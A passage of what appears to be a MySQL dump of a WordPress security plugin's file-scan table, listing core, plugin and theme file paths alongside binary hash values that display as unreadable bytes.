c','',0,'?'),('+��s�s�zҖx!��P�','wp-includes/wp-includes/js/tinymce/plugins/textcolor/plugin.js',0,'�%i�3����f����','�%i�3����f����','(��EL����b[��K�!s�ӊ�nIJ��','',0,'?'),('+�eE�6y��d~�	�','wp-includes/wp-includes/js/jquery/ui/effect-slide.min.js',0,'�;I^�\Z+:C��)H[','�;I^�\Z+:C��)H[','Y��� �%��!���d!F��r`�݀��4','',0,'?'),(',�\Z�J\'�AWh��','wp-content/plugins/wordfence/views/options/option-label.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'`������a��� ��','�����y���DFR#\\\\F/��G%RY��x!�B6a','',0,'?'),(',8Ф��yR�h�','wp-content/plugins/wordpress-seo/js/dist/externals/analysisReport.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�%-��ijߣ�^7�q','XwH���ںE��%�0Qz^�@r\'�hغ��M��','',0,'?'),(',���d�ny���','wp-content/plugins/wp-smushit/core/external/free-dashboard/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���@����,Dl��x�','��+�g��?��{�Dn�B�NU�7d�\n�YI�','',0,'?'),(',\"�Qx��>��r�w۬�','wp-content/plugins/wp-cerber/assets/flags/aq.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\rH���ګ�r-��q�','E?�\Z��)�p;^y��܈vI���EF�2��','',0,'?'),(',+�d����(5<)���','wp-content/plugins/wp-smushit/app/views/lazyload/meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R~3�o�7���.�_,','�s��h�����W�7�:��Ro�lR��@=�s','',0,'?'),(',8�z�f��D7� >','wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Bold.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r�N\'~Y�P����%�','�-b\"�C�Z)b��U�k���(\Z�����=�','',0,'?'),(',<�� �?C]�0A�','wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ͷ���U裦�h�','��ehӧ�&έ��A�3�+WTh��\n\Z)�?��','',0,'?'),(',CYB���EMf*V{�','wp-includes/wp-includes/widgets/class-wp-widget-rss.php',0,'9aP��,\n0��cHt��','9aP��,\n0��cHt��','�t�e�������wn2�v�\0o����e��2','',0,'?'),(',G4���(���+X��4','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png',0,'�I��m���LWyݓH','�I��m���LWyݓH','�\rfl�դ/�;l\\��\\.6��r�#P�[��','',0,'?'),(',Ip��U�w�b��A@#','wp-includes/blocks/spacer/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���SU���<N���BM','JD�$��֎�]V�NuƒδoB�i��W���_�','',0,'?'),(',R�3Z�9�i�G���','wp-includes/blocks/search/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w-ͺ��axX�8.','Z�ϭn��ܠ�43�wƶ~آ�L��S�{N','',0,'?'),(',]\'N�%ݑUeT���)','wp-includes/js/dist/annotations.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���k�R�?\Z�\0�\0�','\'	t���P��g\n���>�׈0�q\'-v�O���','',0,'?'),(',dNe�8�����\"�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Cookie/CookieJar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�z76C\Zʼn���A_�','�4��\"ٯ/#1Z�{rs����z����kc','',0,'?'),(',h��^【+�_&��','wp-includes/blocks/comments/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����7OLr���y','��\'`� ���z�ݥeE��T�^�u���.kK�v','',0,'?'),(',x2�m�<\'$AH��Z','wp-includes/wp-includes/sodium_compat/lib/sodium_compat.php',0,'�A�\'I5��xN�$��','�A�\'I5��xN�$��','�m����<��	p�(t)P7��r�~^��闦��','',0,'?'),(',z�e��Y#uJ~[P\r','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' OpR{�ҵ��Gݍ�','�Y��:B���P5M��s_�����.ن�֎�','',0,'?'),(',���@��hj�qrޒ�','wp-includes/ID3/module.tag.id3v2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y��\0�L������c','����WOUj<�|������M p�m*2�','',0,'?'),(',�hɃs?4B[�^՝','wp-includes/SimplePie/Cache/DB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w���M�\rʍ�|D�','g#�����]\"�h0Vq�)�0��j�%���I�','',0,'?'),(',��ʄ}�z��U��','wp-content/plugins/wordpress-seo/src/presenters/webmaster/google-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�\'#����µ�u_','2��d�e;��piM<�ı�9~���7�&V]m�','',0,'?'),(',�M�&���K�f~��hK','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-user-login.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s7�Nӫ&s�B\"#t1l�','i��Chڒ�o����F#����9p7b����v�B','',0,'?'),(',�K�(:dIR�,���','wp-content/plugins/wp-smushit/app/modals/restore-images.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+o�j:��%��F�^\'D�','՟y�w\Z�lG?�h�s��n�Ì�Kc��','',0,'?'),(',�\rgf��Z���\r�s','wp-includes/wp-includes/sodium_compat/src/Crypto.php',0,'�-p����\0E�cb�c�','�-p����\0E�cb�c�','\"�̘�L���!�{rDnPz^��X�j��Lk','',0,'?'),(',��M��Gg���','wp-content/plugins/wp-fastest-cache/css/flaticon.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2�b2+�6�<~�:','ʭ,o�*V�٫��M�c�\Z�H��+*���[','',0,'?'),(',�?#:��	��5k�','wp-includes/wp-includes/js/media-audiovideo.min.js',0,'�f��}�юFǑ+���','�f��}�юFǑ+���','���U��#�QC�F����F:,�}��u���KP','',0,'?'),(',��uD{\Z��q�$�|','wp-content/plugins/wp-smushit/app/views/webp/meta-box-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۲��/ۉO�Z�͢�6','E�\'z����D4��n��!(B�q��\\%�Ĩov','',0,'?'),(',��(X\'����%Z��|','wp-includes/blocks/group/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.w��.�(�\'G��\0','lB�m��	�rz?���,݊�%�4���U��&Of','',0,'?'),('-\r�7�<9m{�1Sq','wp-content/plugins/redirection/models/redirect/redirect-sanitizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�!���2KD<�U�','�XVy��M�\nْy���I	oLk�YC�.u','',0,'?'),('-OՈ6O�iY�W5','wp-content/themes/hitmag/inc/kirki/core/class-kirki-init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v&EG�.-[�8','��i���cJ/}/�pfwX��h�O!6�','',0,'?'),('-�T��a�P�?�0et','wp-content/plugins/wordpress-seo/admin/class-admin-init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ś��9��7`���&R','|�10��6	qt�Kc֒x�rb���i�T���','',0,'?'),('-+�ppRv�M�#^0-�','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-de_DE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8h�q}��Rr�B','\Z�ww�rd��C�e�Mʵ�AY��y94,O�','',0,'?'),('--�ü��$�);��J5','wp-includes/js/dist/rich-text.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�xO�<�+������^','�h^��?�=��\r�3���I�t�\Z7<�\0�c','',0,'?'),('-/@��B���F�}R�+','wp-content/plugins/wp-cerber/assets/flags/ug.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�b�����MH�{','�W��P\Z G��T���ߙ�h5�OeU�^����','',0,'?'),('-\\��[�����J�ץ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�1���	�M����]�','��A8��{�!��V�t<S��qH�oh�4��y`By�','',0,'?'),('-e��2�-�Ȟ�\Z�n�','wp-content/plugins/wp-fastest-cache/css/fonts/db/Flaticon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��� ���26Ž���','�~�ĜaD����6�����JG/\r �Zp3O$��','',0,'?'),('-g�0�~BD�>IF���','wp-includes/wp-includes/class-walker-page.php',0,'�;C\r��7�l����','�;C\r��7�l����','q	��MQ�Anq2Y|��]�d�]����R!(�','',0,'?'),('-jާ� �����~hyb','wp-content/plugins/wordfence/lib/menu_support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z[�t*�&Y5���ٙ','��)�D�	\r��#\"�G�ҥPU�J���\0@8W��','',0,'?'),('-kdϯ���X�w\\7���','wp-includes/admin-bar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_��5�[��\'�','�V�t��,�Ӣ�cW�a^�d������^_�','',0,'?'),('-w��kh�P���{%�','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.min.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�.��(�K�pQ��','�ٍ$rb=p�h�x�K��5]8�Q���R��jn4','',0,'?'),('-w�T��r�Y��90�y`','wp-content/plugins/wp-cerber/cerber-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xf�ڒ�k�Di��','�� f����7�6��\"������`)���','',0,'?'),('-x��c�k�#��/�}��','wp-content/plugins/wordpress-seo/css/dist/yoast-components-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C���ZD`EU@O�&mV4','��pw��~7�MIe�HH\n<���g\ZQ��Pp�ڨ','',0,'?'),('-����Ǹ�%w=��','wp-admin/css/colors/ocean/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=A��$o���cV�','3�3�g�(u�2-*6{�j��=��Pg�0M����}','',0,'?'),('-��w�3�(\"O5kds�','wp-content/plugins/redirection/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','--�\"7��2�ZZ','+�z2&��?Ev1R\n�yʊ��\Z��','',0,'?'),('-���_���mq+��1�','wp-content/plugins/wordfence/modules/login-security/classes/model/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h㠲���i�e��ɡ','IH�Mp\\��N�h\n׈N��F=-���Z�=hO','',0,'?'),('-��)7�5y�8c��Wv�','wp-admin/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֮yѷH�����%��','�Fled9�jiRu1rq��Y�0�6�z��u��','',0,'?'),('-�_��+��Yn��S','wp-includes/js/jquery/ui/tooltip.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OL1m��Mg)ת�\'(��','f#�7�6@4���97�8�Y>̓���$�','',0,'?'),('-�f��4]�#\"u��l','wp-admin/css/colors/light/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�jH\'�I��b�','����S���L<>V�#e�)%��A�j<P|֢','',0,'?'),('-�o����J�e��','wp-content/plugins/wp-smushit/core/external/plugin-notice/assets/images/plugins-smartcrawl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X#B\'q��ia\Z���L�D','�)���F|��V��t�I� 6ll$��<��c(\"x','',0,'?'),('-���g�N�u�2s�a','wp-includes/wp-includes/css/wp-embed-template-ie.css',0,'�)6��	؞мq ���','�)6��	؞мq ���','�o��+8]�Su�H.�C�g��R9�&�+���\\W�','',0,'?'),('-��藂��Y{]ns�','wp-includes/css/wp-pointer.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kh���:�]w\\��cUK','A��Mj�%U�uք\"��Z����vl=(n�H��','',0,'?'),('-��5�t�U�1Y�v	','wp-content/plugins/wordpress-seo/src/values/images.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,��\r�w&\"�ylu','�{ ��@\0��ѻn�\r��”�m}HF�T�!','',0,'?'),('-��;�W��&�ܽ�`T','wp-content/plugins/wordpress-seo/src/exceptions/indexable/source-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�K@C��T����Y4','�u�gt=mg�*ӣ�̉�\0�@��_㾅�*�R\n','',0,'?'),('-�ި�СJI7$b���','wp-content/plugins/wp-smushit/app/views/tools/meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��})��_�25��Y7U','�-��J��%\"�#qMU�O$�=��h��,���?','',0,'?'),('-��v�	N�\'�`��','wp-content/themes/hitmag/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ف�\"a6ߛ-�~lxq��','\\D]����F��	���}K\'���B���\ZH��','',0,'?'),('.@�b���ۑ�q��','wp-content/plugins/wordpress-seo/src/conditionals/headless-rest-endpoints-enabled-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RpHP@��Hz�R�c','#R��q��C\\#w��}� �j��dњ(^d�','',0,'?'),('.Lۡgށ��^�L','wp-content/plugins/wordpress-seo/admin/pages/metas.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c�ĥ?�攺rV8V{�','$xπ3���\0I�:f�K:��\'�\'����','',0,'?'),('. M�;�࣍_�\\��T','wp-content/plugins/wordpress-seo/src/presenters/twitter/description-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w���{�\Z��\n�n','N�L�%�*E��V�&�}��r���:�6K','',0,'?'),('. �\0_oE�]A�_�0PJ','wp-includes/js/tinymce/plugins/wpautoresize/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�.�Aj_�m�r#i�','\'��C��b\"B��\\�N�N���*r&.X��J','',0,'?'),('.?�o{��֭�}I)�A\r','wp-content/plugins/wp-smushit/_src/scss/accessibility/_color-accessibility.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vؤ��w�lM%��Ǭ0�','~	(9��W�����$O<����jI%�P(�שy','',0,'?'),('.D�^-����{�����','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/it.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.I�ڴٵ	+{�B��','xJH�1����%�3�x�ᾋ\\��±0(X�3=�','',0,'?'),('.IhU���3��+B\Z��','wp-includes/images/admin-bar-sprite-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q����8��o��','*E��Ts���al�^�p��X���Z\0��','',0,'?'),('.QU3�x�xR��','wp-includes/wp-includes/js/jquery/ui/checkboxradio.min.js',0,'˂��_���>��Klk','˂��_���>��Klk','Ě�8�\nm��r+\"�?�~iLOVR~��C','',0,'?'),('.Q��ј��a��B1��','wp-content/plugins/wp-smushit/app/assets/js/smush-admin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܖW�R��o�b��w$','��%�>�f�N�3Rf�J��ȟ� ����4q�H','',0,'?'),('.cԩm���gw�X�qS','wp-content/plugins/wp-cerber/assets/flags/ly.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�V#\ZG�d�]�4K�(','��@3��ia�%��B%V�K則/q�Y�/�|�D�','',0,'?'),('.fέ��b��d��8C�','wp-content/plugins/wp-smushit/app/assets/images/updated/updated@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"{�]��>�֯�]','$5\Z+�p��\Z�{Ϥc9sQ�+��R�r���֌\\','',0,'?'),('.k;�������w��q','wp-includes/blocks/post-author/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-����N�جY��#E�','S!�\0��ljl��i�b-�{�r8ڨ\r�|B�c','',0,'?'),('.x��Ϯ�7����_�','wp-includes/js/mediaelement/mediaelement-and-player.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\n�.�A�J��4I','���S{h�d�����q(���^�s\'�%�a%','',0,'?'),('.{An_<-���N�]�3','wp-content/plugins/wp-cerber/assets/flags/gt.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=��н8��ժݩ�','��ɑ����?�w�+l����3�r��Iw','',0,'?'),('.��P��1��+��','wp-includes/wp-includes/customize/class-wp-customize-code-editor-control.php',0,'��jM�і���lM��_','��jM�і���lM��_','�xFZ�Kc��3�7�`Ԫ$j�g�]�Q��','',0,'?'),('.���@k��N?ZQ5','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/ParameterBag/FrozenParameterBag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��<��e�Ҡ','V�Q�%���ļ�	���\ru�Tf!BM����Nvq','',0,'?'),('.�麉D0�u�L-c�','wp-content/plugins/wordfence/views/options/option-toggled-segmented.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���B�W#��#���','�^�<��4��e,��\0��l�����\r�!d','',0,'?'),('.�=��$��.�6��(','wp-includes/blocks/button/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m��4���&J��)�','C(�I�����>dv%Xbn{�oi�R�T��z �q','',0,'?'),('.�YM��}츈^��','wp-content/plugins/wp-cerber/assets/flags/tj.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)1��\\L��O���',']X�O3=6�ˈ�.�Ү����N��#(�N�D�`','',0,'?'),('.��������.5%','wp-content/plugins/wp-smushit/app/common/footer-plugins-upsell.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���٦6X�\0��-t','BÕ�~�Ļ���Z{�&�D��q�Q%��؏ky','',0,'?'),('.�E�[J��l�x��','wp-content/plugins/wordfence/images/forward_disabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M_��Z?�N)�Ҋ�:�5','���/�<>O&�ȕJR݇e�}�(��m','',0,'?'),('.��7�f�w9Pm@����','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/jwt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0�H�#�IHD���','�v�o�VYx�?���\n��\n&3c-\r�8�m��','',0,'?'),('.��DK\'�T�	?g�EYt','wp-includes/wp-includes/js/dist/keycodes.min.js',0,'aY�=�Q\n�x��,��','aY�=�Q\n�x��,��','���Gֻ�S�����7�֕�g]Y��P�','',0,'?'),('.����Z�g����','wp-includes/wp-includes/js/wpdialog.js',0,'Ʒy\n	� ep�ԩf','Ʒy\n	� ep�ԩf','��!/�A��f�0=��G�7�h�/�uU�&g��','',0,'?'),('.�|G�xܣ�yId��','wp-content/plugins/wordpress-seo/src/builders/indexable-system-page-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�}�z��6��n��','߅4n�y�z�E#2O�n����OKR]-�E*��','',0,'?'),('.��Ϡ�a?馺W�8ӵ','wp-includes/rest-api/endpoints/class-wp-rest-pattern-directory-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wp�ɛ�ʷ����5','+��Q˲<9l����U�\r{��&-�\\2**��n�K','',0,'?'),('.����Q�B4��բag','wp-content/plugins/wordpress-seo/src/helpers/redirect-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L	�U�|��	|(J<','��ŧ�mB+1�@ո\'����n��/:$��','',0,'?'),('/�j#0à�q�%�F�','wp-includes/wp-includes/js/clipboard.min.js',0,'����r��T��tu�','����r��T��tu�','yA�y3�h�|�Г�L�����i=���>�j','',0,'?'),('/\'l�ȞC�aݟ@��9�','wp-content/plugins/wordpress-seo/src/integrations/front-end/schema-accessibility-feature.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b<ⶰk��`�n-���','���^�&��ֻ��#z\00����=jWџ�6�E','',0,'?'),('/*:����o>�t����','wp-includes/js/dist/autop.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',(��=�V�f^$��\"','R���U\0�ۚ3�h2c���N�\0�{�D��&�','',0,'?'),('/++�%̀�4y@cUI�','wp-content/plugins/redirection/models/file-io.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���i�H�f\n��F��','�i��>�+9\"��[ycu��6��dzm-�b0B','',0,'?'),('/5Lk����>U��D','wp-includes/wp-includes/css/dist/edit-post/style.min.css',0,'�����n	�VQ�H��','�����n	�VQ�H��','Y��^�Up���yx.ΕP��\0���\Z�����','',0,'?'),('/<ا^ɼf}�\"��$�','wp-includes/images/media/document.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�4�8�Αy�6�d�','��ø`�������f	I$ _Z�X�\"0\r��,','',0,'?'),('/?譚��fe<ckV�','wp-content/plugins/disable-gutenberg/inc/settings-register.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+&q:��վ�G�f‚','1|����?)��,�_k�O\"�7GE���','',0,'?'),('/@���~�Ip�� ��','wp-content/plugins/redirection/redirection-version.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ޯr�[V( ��\"�9#@�','AB�`A	$$��\0�%=���*r���n,àc�','',0,'?'),('/E�0�S_���:`���','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-dashicons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4‚���y���즞F�x','5t��Z�ڸ�87��V��GR�=ƊZ����]�','',0,'?'),('/cG�6gj�	>�n|^','wp-content/plugins/wp-smushit/app/assets/js/smush-sui.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�W\\��p�W��','����x��>g���jN�\Z��r�?���0��2�','',0,'?'),('/q��F���>_�MCa','wp-content/plugins/wp-smushit/_src/js/tutorials.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@H�h`8���Pۢ&�','_�d�!w��\0�#�e���0�����Z\\�','',0,'?'),('/t���6�L�Rf(.*;�','wp-content/plugins/wp-cerber/assets/flags/gb.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&9;���0�s&��@�','��O+��u���-<�w��P�D�@姄��6','',0,'?'),('/����\r���K^���','wp-content/plugins/redirection/matches/from-url.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\")Y��VV���Oa|[�','�p�\0l0��L/ݫ�ؽ#����e\0��D:P�','',0,'?'),('/���{z�$��ߙ�9','wp-content/plugins/wp-cerber/assets/flags/lk.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(	*��€�E�','G��g�T�CQEL/���Δ*��Or�2�K�EU=�','',0,'?'),('/��}㦿L�;?�w\\','wp-includes/Requests/Exception/HTTP/401.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��o��X�N���R�','YV$���/���@=������V-��dc�','',0,'?'),('/�s��C4�������','wp-admin/network/setup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	w�����T�A;�}Ad','��韌�\'�MN�+�ƺ�R����g','',0,'?'),('/��<&�����1K[�{','wp-content/plugins/wordpress-seo/src/deprecated/admin/license-page-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r-y%2�#��e��','�V$��jD3�D1�c��~��?R7ݹ@�԰','',0,'?'),('/鹠���ΰ1�iw��','wp-includes/images/uploader-icons-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&-��O��Õ�~','���r�\0����\'_>��6��QW��4ڠR��','',0,'?'),('/��f��P�j>X��','wp-includes/sitemaps/class-wp-sitemaps-renderer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����c&��N��','¶�	[Wqt��)���\Z��� <��\r�/fu','',0,'?'),('/�����5SQU۶v+�','wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�J�f������<&�U','02G��;�R���\r��4��\\K��C7_','',0,'?'),('/��3��cs]m���','wp-includes/wp-includes/js/jquery/jquery.schedule.js',0,'&��T�k�f؞���','&��T�k�f؞���','��?��vEʔ��wj���C�P՝��_��','',0,'?'),('0#��\Z�9��U�)�','wp-includes/wp-includes/class-wp-user-query.php',0,'T�Iyʰ�BzR��>�O','T�Iyʰ�BzR��>�O','�gu,�$�bh�/7��C�<�l=��0x�3�x','',0,'?'),('0%��տ�Na�Vϴ','wp-content/plugins/wp-cerber/assets/flags/gl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\t�U�O�O��b��','z�Saz搖��ǓoY�kf(e�F��)`ZC','',0,'?'),('01���$��t���/�','wp-content/plugins/redirection/locale/json/redirection-es_MX.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������N��u	&/�','���������=�6Ox 6޳�扰Gz{\Z�k','',0,'?'),('0<����lڿ��J��','wp-includes/js/wp-backbone.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G���	1�Y!�z� ','\"����I��`��I�:	��OX7ꆼ)�2�','',0,'?'),('0=��P*�3!�^G��','wp-includes/wp-includes/js/dist/element.js',0,'pO�E����6�wR%v','pO�E����6�wR%v','�h�4[��0��7-��\\{�e��$.(.���o�','',0,'?'),('0D�9�_�yK�$�B','wp-content/plugins/wordpress-seo/src/deprecated/frontend/class-frontend-page-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n����8��-	ƧZ','� ���Jm�dk�ۚ�a�h�4�$;��A�$','',0,'?'),('0Op�1��qr7���^','wp-includes/wp-includes/random_compat/random_bytes_libsodium.php',0,'4������Տ��d�','4������Տ��d�','�I�n��6��_����ga8��y��].��','',0,'?'),('0Y.q�~����D����','wp-content/plugins/wordpress-seo/src/helpers/twitter/image-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B��dx�%��W�','�-i)X�F5��S���m�\'2-ǩ�4���M�H','',0,'?'),('0]�qK\'�f�x����','wp-includes/js/tinymce/plugins/compat3x/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�{��p�׶�Ҡ','��m�澑�[�S3��\'�J�*��Sts�j���','',0,'?'),('0j�Vƽ�f:�5��`�\\','wp-includes/js/customize-selective-refresh.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3D՜�Y�*���V�%>','/��Nx~�jw��PYWr�O�^�Zq��Q�\Z$','',0,'?'),('0x�h��ͭK��3��T','wp-includes/class-wp-fatal-error-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�ݯ��	0U�⮴�',' w�=\nY�{U>M���`���\r4VK�T�L�','',0,'?'),('0�)N6�ܫ�lI\'�','wp-includes/wp-includes/css/media-views-rtl.min.css',0,'m���X�Н�KH�Os8�','m���X�Н�KH�Os8�',')�Z\\��^��hG*y����2Ԏ�k]䜹Yu�5*','',0,'?'),('0����a�O�ZI|I�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�HY ��²��','zI]�_�Dz��!�bш�6�d�uY�3','',0,'?'),('0����}=�Y]q�.','wp-includes/wp-includes/option.php',0,'�]�2�ZB0����','�]�2�ZB0����','����+�9*$��<��*G�T���:*N�j���','',0,'?'),('0����k� ?ޞ���','wp-includes/js/jquery/ui/effect-scale.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y[�Y��y���qD;�','�9��R�/�O��@�\"A�R�ܬv��	�TJnZ\\','',0,'?'),('0��<K�}�����ׇ','wp-includes/blocks/image/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:����y5��K�r',':lQ\'���.����=iRJmO�u�Þd�EP','',0,'?'),('0�˫&����´U�','wp-content/plugins/wordfence/css/fullLog.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�.i�`��΁�U�v','?�>��?h�ξ[�²�P�u�{�pu�a����a','',0,'?'),('0���E\00���X�H','wp-includes/js/colorpicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/����kF���x�q�','T@\"$:����	G�LB�}2P��HR��� �','',0,'?'),('0���`P�V��y\0�','wp-includes/wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php',0,'�H\r\r�0�X/^�0R','�H\r\r�0�X/^�0R','O��1�-p�Qۊ��8�Z+�$[��j���K��','',0,'?'),('0�%,�4�)Y8 P�R��','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-name-control.php',0,'��7�f�W�՚7���','��7�f�W�՚7���','p��v�w 